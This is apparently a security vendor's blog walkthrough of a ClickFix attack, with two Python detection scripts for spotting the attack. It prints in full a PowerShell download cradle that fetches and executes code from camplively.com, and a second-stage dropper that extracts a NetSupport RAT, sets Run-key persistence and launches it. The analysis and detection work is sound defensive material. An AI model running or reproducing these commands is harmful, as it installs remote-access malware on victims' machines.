
ClickFix to Remote Access: A Step-by-Step Walkthrough

This article walks through a real-world ClickFix attack—encountered by a customer, detected and prevented by Keep Aware.
From Search Engine to Compromised Site
A user ran a search and clicked a result that led to a compromised site. The site had been injected with a script element loaded from an external domain. That script shows the visitor the legitimate web page while it checks whether the user has visited the site before; on a first visit, it displays a fake CAPTCHA.

Fake CAPTCHA, ClickFix Prompt
The fake CAPTCHA verification prompts the user to click the checkbox to ‘verify they are human’. Upon clicking the element, the malicious JavaScript populates the clipboard contents with malicious code and instructs the user to press the Windows key + R (to open the Windows Run dialog box), paste the clipboard contents, and press Enter.

Below is the command that’s silently copied to the user’s clipboard. The initial PowerShell download cradle kicks off a series of malicious commands.
C:\WINDOWS\system32\cmd.exe /min /c powershell -NoP -ExecutionPolicy Bypass -w 1 -c "$p1='https://camplively';$p2='.com/all.php';$af=$p1+$p2; $xo=(Invoke-WebRequest -UseBasicParsing $af).Content; Invoke-Expression $xo"
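For detection engineers, the cradle above is a good test case for a command-line heuristic. The script below is an added example written for this article (it is not Keep Aware's detection logic): it scores process-creation command lines on the traits the cradle combines (hidden window, profile and execution-policy bypass, a web download piped into Invoke-Expression, and a URL split across two variables) and, for flagged lines, reassembles the split URL so it can be blocked and hunted. The indicator weights, the threshold of 6, and the two benign sample command lines are assumptions constructed for illustration.

```python
"""Heuristic scoring of command lines for ClickFix-style PowerShell download
cradles. Added example, not Keep Aware's detection logic. Indicator weights,
the threshold and the benign samples are assumptions for illustration."""
import re
from typing import Dict, List, Tuple

# Each indicator: (regex, weight, label). Weights are illustrative assumptions.
INDICATORS: List[Tuple[str, int, str]] = [
    (r"(?i)\bpowershell(\.exe)?\b", 1, "powershell"),
    (r"(?i)(?<![\w-])-no?p(rofile)?\b", 1, "noprofile"),
    (r"(?i)(?<![\w-])-ex(ecutionpolicy)?\s+bypass\b", 2, "ep-bypass"),
    (r"(?i)(?<![\w-])-w(indowstyle)?\s+(1|hidden)\b", 2, "hidden-window"),
    (r"(?i)\b(invoke-webrequest|iwr|downloadstring|downloaddata)\b", 2, "download"),
    (r"(?i)(?<![\w-])(invoke-expression|iex)\b", 3, "iex"),
    (r"(?i)\bcmd(\.exe)?\s+/min\b", 1, "cmd-min"),
    (r"\$\w+\s*\+\s*\$\w+", 1, "var-concat"),  # $p1+$p2 style URL splitting
    (r"(?i)'https?://[^']*'", 1, "quoted-url"),
]
THRESHOLD = 6  # assumption: tune against your own baseline of benign PowerShell use

ASSIGN_RE = re.compile(r"\$(\w+)\s*=\s*'([^']*)'")   # $name='literal'
CONCAT_RE = re.compile(r"\$(\w+)\s*\+\s*\$(\w+)")     # $a+$b


def score_command_line(cmd: str) -> Tuple[int, List[str]]:
    """Return (score, matched indicator labels) for one command line."""
    score, hits = 0, []
    for pattern, weight, label in INDICATORS:
        if re.search(pattern, cmd):
            score += weight
            hits.append(label)
    return score, hits


def is_clickfix_cradle(cmd: str, threshold: int = THRESHOLD) -> bool:
    return score_command_line(cmd)[0] >= threshold


def reassemble_split_strings(cmd: str) -> List[str]:
    """Rebuild strings the cradle splits across variables ($p1+$p2) so the
    full download URL can be extracted for blocking and hunting."""
    assigned: Dict[str, str] = dict(ASSIGN_RE.findall(cmd))
    joined = []
    for left, right in CONCAT_RE.findall(cmd):
        if left in assigned and right in assigned:
            joined.append(assigned[left] + assigned[right])
    return joined


# Constructed sample command lines: the first is the cradle from the article,
# the other two are benign administrative uses (assumptions).
SAMPLE_EVENTS = [
    r'''C:\WINDOWS\system32\cmd.exe /min /c powershell -NoP -ExecutionPolicy Bypass -w 1 -c "$p1='https://camplively';$p2='.com/all.php';$af=$p1+$p2; $xo=(Invoke-WebRequest -UseBasicParsing $af).Content; Invoke-Expression $xo"''',
    r"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Scripts\nightly-backup.ps1",
    r'"C:\Program Files\Git\bin\bash.exe" --login -i',
]


def triage(events: List[str]) -> List[Dict[str, object]]:
    """Score each command line; attach reassembled URLs to flagged ones."""
    results: List[Dict[str, object]] = []
    for cmd in events:
        score, hits = score_command_line(cmd)
        entry: Dict[str, object] = {"score": score, "hits": hits,
                                    "flagged": score >= THRESHOLD}
        if entry["flagged"]:
            entry["urls"] = reassemble_split_strings(cmd)
        results.append(entry)
    return results


if __name__ == "__main__":
    for result in triage(SAMPLE_EVENTS):
        tag = "ALERT" if result["flagged"] else "ok   "
        print(f"{tag} score={result['score']:2d} {result['hits']}")
        for url in result.get("urls", []):
            print(f"      reassembled URL: {url}")
```

The benign `-NoProfile -ExecutionPolicy Bypass -File` line scores 4 and stays below the threshold, which is the point of weighting: no single switch is malicious on its own, but the cradle stacks several of them with a download fed straight into `Invoke-Expression`. The reassembled URL is the value to feed into proxy or DNS blocking rather than the fragments, which are chosen precisely to defeat naive string matching.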
Malicious Commands, Subsequent Execution
Once executed, the downloaded PowerShell script performs a series of downloads and de-obfuscation steps, assembles the malware on the host machine, and sets up persistence. Line 31 shows the malware setting up persistence in the user's Run registry key, meaning it will execute each time the victim logs in to the machine.
 1  Add-Type -Name w -Namespace u -MemberDefinition '[DllImport("user32.dll")]public static extern bool bbilr(IntPtr hWnd, int n);' -ErrorAction SilentlyContinue;[u.w]::bbilr([Diagnostics.Process]::GetCurrentProcess().MainWindowHandle,0)|Out-Null;
 2  $XXQIU = "https://camplively.com/vusm.zip?lap=5036"
 3  $ONFPNWOZOBCMHQVEW = (New-Object System.Net.WebClient).DownloadData($XXQIU)
 4  $randomSubDir = -join ((65..90) + (97..122) + (48..57) | Get-Random -Count 8 | ForEach-Object {[char]$_})
 5  $BTWPVUZEAXOFTJU = "$env:ProgramData\$randomSubDir"
 6  if (-not (Test-Path $BTWPVUZEAXOFTJU)) {
 7      New-Item -Path $BTWPVUZEAXOFTJU -ItemType Directory -Force | Out-Null
 8  }
 9  $TEJCLHYQ = New-Object System.IO.MemoryStream
10  $TEJCLHYQ.Write($ONFPNWOZOBCMHQVEW, 0, $ONFPNWOZOBCMHQVEW.Length)
11  $TEJCLHYQ.Position = 0
12  Add-Type -AssemblyName System.IO.Compression
13  $IJPOZWQKIOUXDDG = New-Object System.IO.Compression.ZipArchive($TEJCLHYQ, [System.IO.Compression.ZipArchiveMode]::Read)
14  foreach ($VLFNPBZGMVVOIXVLIGRDP in $IJPOZWQKIOUXDDG.Entries) {
15      $GNOQUXITMTUJUZSARVMP = Join-Path $BTWPVUZEAXOFTJU $VLFNPBZGMVVOIXVLIGRDP.FullName
16      $QTSWHFILJDPRHAJUXR = Split-Path $GNOQUXITMTUJUZSARVMP -Parent
17      if (-not (Test-Path $QTSWHFILJDPRHAJUXR)) {
18          New-Item -Path $QTSWHFILJDPRHAJUXR -ItemType Directory -Force | Out-Null
19      }
20      if ($VLFNPBZGMVVOIXVLIGRDP.Length -gt 0) {
21          $VBHYKOCOQLYFL = $VLFNPBZGMVVOIXVLIGRDP.Open()
22          $VPEKSWI = [System.IO.File]::Create($GNOQUXITMTUJUZSARVMP)
23          $VBHYKOCOQLYFL.CopyTo($VPEKSWI)
24          $VPEKSWI.Close()
25          $VBHYKOCOQLYFL.Close()
26      }
27  }
28  $IJPOZWQKIOUXDDG.Dispose()
29  $TEJCLHYQ.Dispose()
30  $YSQGRKQCMYDNPBQT = "$BTWPVUZEAXOFTJU\client32.exe"
31  sp HKCU:\Software\Microsoft\Windows\CurrentVersion\Run MySoftware $YSQGRKQCMYDNPBQT
32  saps $YSQGRKQCMYDNPBQT
Code. The malicious PowerShell code that was downloaded and executed by the initial download cradle.
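Lines 4, 5, 30 and 31 of the script leave a distinctive trace: a Run value written by powershell.exe that points at client32.exe inside an eight-character random folder under ProgramData. The following added example (written for this article; it is not Keep Aware's or Sysmon's code) evaluates Sysmon-style "Registry value set" events (Event ID 13) against those traits and grades each event. The field names follow Sysmon's Event ID 13 layout, the four sample events are constructed, and the "random-looking name" rule and the two-reason alert threshold are heuristic assumptions.

```python
"""Grade Run-key persistence events for the traits of the dropper in the
article. Added example, not Keep Aware's or Sysmon's code. Field names
follow Sysmon Event ID 13 (RegistryEvent, Value Set); sample events are
constructed; the randomness rule and alert threshold are assumptions."""
import re
from typing import Dict, List

RUN_KEY_RE = re.compile(r"(?i)\\Software\\Microsoft\\Windows\\CurrentVersion\\Run(Once)?\\")
# Locations a non-admin user (or a script running as the user) can write to.
USER_WRITABLE_RE = re.compile(
    r"(?i)^[A-Z]:\\(?:ProgramData|Users\\[^\\]+\\AppData\\(?:Local|Roaming)|Windows\\Temp)"
    r"\\(?P<subdir>[^\\]+)\\"
)
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
                "wscript.exe", "cscript.exe"}


def looks_random(name: str) -> bool:
    """Line 4 of the dropper builds an 8-char name from upper, lower and digit
    characters. Heuristic assumption: length 8, alphanumeric, and at least two
    of those character classes present. Legitimate names can also match."""
    if len(name) != 8 or not name.isalnum():
        return False
    classes = sum(1 for test in (str.isupper, str.islower, str.isdigit)
                  if any(test(c) for c in name))
    return classes >= 2


def assess_run_key_event(event: Dict[str, object]) -> List[str]:
    """Return the list of suspicious traits found in one Run-key write."""
    reasons: List[str] = []
    if event.get("EventID") != 13 or not RUN_KEY_RE.search(str(event.get("TargetObject", ""))):
        return reasons
    target = str(event.get("Details", "")).strip().strip('"')
    m = USER_WRITABLE_RE.match(target)
    if m:
        reasons.append("run-value-in-user-writable-dir")
        if looks_random(m.group("subdir")):
            reasons.append("random-looking-subdir")
    image = str(event.get("Image", "")).rsplit("\\", 1)[-1].lower()
    if image in SCRIPT_HOSTS:
        reasons.append(f"written-by-{image}")
    # client32.exe is the NetSupport Manager client binary (line 30 of the
    # dropper); outside a Program Files install it is a strong hint of the RAT.
    if target.lower().endswith("\\client32.exe") and "program files" not in target.lower():
        reasons.append("netsupport-client32-outside-program-files")
    return reasons


def verdict(event: Dict[str, object]) -> str:
    """Two or more traits alert; a single weak trait is queued for review."""
    reasons = assess_run_key_event(event)
    if len(reasons) >= 2:
        return "ALERT"
    return "REVIEW" if reasons else "ok"


# Constructed Sysmon-style events: the first mirrors line 31 of the dropper,
# the next two are benign Run entries, the last is not a registry event.
SAMPLE_EVENTS: List[Dict[str, object]] = [
    {"EventID": 13, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "TargetObject": r"HKU\S-1-5-21-111-222-333-1001\Software\Microsoft\Windows\CurrentVersion\Run\MySoftware",
     "Details": r"C:\ProgramData\aZ3kQ9xP\client32.exe"},
    {"EventID": 13, "Image": r"C:\Program Files\ExampleVendor\setup.exe",
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ExampleTray",
     "Details": r"C:\Program Files\ExampleVendor\tray.exe"},
    {"EventID": 13, "Image": r"C:\Windows\explorer.exe",
     "TargetObject": r"HKU\S-1-5-21-111-222-333-1001\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive",
     "Details": r"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background"},
    {"EventID": 1, "Image": r"C:\Windows\System32\notepad.exe"},
]

if __name__ == "__main__":
    for event in SAMPLE_EVENTS:
        print(f"{verdict(event):6s} {event.get('TargetObject', '-')}")
        for reason in assess_run_key_event(event):
            print(f"        - {reason}")
```

The OneDrive entry lands in "REVIEW" rather than "ALERT" on purpose: AppData is user-writable, so that trait alone is common, and it is the combination with a script host writing the value and a random folder name that separates the dropper from ordinary software. Sysmon only records these events when its configuration includes the Run keys in a RegistryEvent rule, so check that coverage before relying on this logic.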
NetSupport Manager RAT; RATs and Stealers
This Joe Sandbox submission, from a different site, shows the same attack chain and the same initial download cradle from camplively[.]com, and the final malware file is identified as NetSupport Manager RAT.

More broadly, however, multiple threat groups have employed the ClickFix tactic to gain unauthorized access to victims’ machines, deploying malware and remote access trojans (RATs), including AsyncRAT, Lumma Stealer, DarkGate malware, DanaBot stealer, and others.
Browser Visibility Leads to Detection and Prevention
We became aware of this ClickFix attack because our ClickFix-related policy detected the suspicious commands and clipboard population. It prevented the user from inadvertently running malicious commands on their host device, making the attack unsuccessful.

ClickFix attacks happen within the browser context and have been seen on both malicious and compromised web pages. With native browser visibility, Keep Aware detects this type of clipboard manipulation by web pages and monitors what is written to the clipboard for suspicious code, stopping this attempt by attackers to move from the browser to the host system.
For more information about ClickFix, check out our article, “ClickFix: The What, Why, Where, and How of it All”.